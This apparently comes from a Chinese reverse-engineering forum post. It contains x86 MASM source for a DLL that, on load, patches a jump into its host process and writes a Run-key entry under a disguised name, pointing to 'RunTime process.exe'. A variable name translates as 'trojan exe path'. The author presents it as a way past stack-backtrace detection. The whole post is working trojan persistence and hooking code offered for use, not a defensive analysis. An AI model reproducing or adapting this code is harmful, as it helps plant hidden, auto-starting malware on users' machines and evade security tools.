去年坛子的大大给的思路写的 过栈回溯XXX
.486p
.model flat,stdcall
option casemap:none
assume fs:nothing
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include Advapi32.inc
includelib Advapi32.lib
.data
szKeyAutoRun db 'Software\Microsoft\Windows\CurrentVersion\Run',0
szValueAutoRun db 'baidusdpptoet',0
jmpaddr dd 00
hookaddr dd 00
oldprotect dd 00
dllhandle dd 00
mumaexepatch byte "\RunTime process.exe",0
backbyte byte 5 dup (?);备份5个字节
.code
funcxx proc
ret
funcxx endp
funcx proc
ret
funcx endp
funcxxx proc
ret
funcxxx endp
funcxaxx proc
ret
funcxaxx endp
threadx proc x:dword
invoke FreeLibraryAndExitThread,offset dllhandle,0
mov eax,0
ret
threadx endp
func proc
local @hKey
local @szFileName[MAX_PATH]:byte
invoke RegCreateKey,HKEY_LOCAL_MACHINE,addr szKeyAutoRun ,addr @hKey
;invoke GetModuleFileName,NULL,addr @szFileName,260
invoke GetCurrentDirectory,260,addr @szFileName
invoke lstrcat,addr @szFileName,addr mumaexepatch
;inc eax
;mov @szFileName,'x'
invoke lstrlen,addr @szFileName
invoke RegSetValueEx,@hKey,offset szValueAutoRun,NULL,REG_SZ, addr @szFileName,eax
invoke RegCloseKey,@hKey
ret
func endp
start proc x,y,z:dword
.if y==DLL_PROCESS_ATTACH
push x
pop dllhandle
jmp xyz
xyz:
jmp pushaddr
pushaddr:
invoke GetModuleHandle,NULL
add eax,100Bh
mov hookaddr,eax;这里已经指向指定代码了
mov jmpaddr,eax
;解除保护区域是hookaddr+100
nop
nop
nop
nop
nop
nop
mov byte ptr [backbyte],0E9H
mov eax,offset func
mov ebx ,hookaddr
sub eax,ebx
sub eax,5
mov dword ptr [backbyte+1],eax
invoke VirtualProtect, jmpaddr,1000,PAGE_EXECUTE_READWRITE, offset oldprotect ;
;lea eax,jmpaddr
;lea esi, offset backbyte
;cld
;movsd
;movsb
invoke GetCurrentProcess
invoke WriteProcessMemory,eax, jmpaddr,offset backbyte,5,NULL
;invoke CreateThread,NULL,NULL,offset threadx,NULL,0,NULL
jmp jmpaddr
.endif
ret
start endp
funcxxxxx proc
ret
funcxxxxx endp
end start
[课程]FART 脱壳王!加量不加价!FART作者讲授!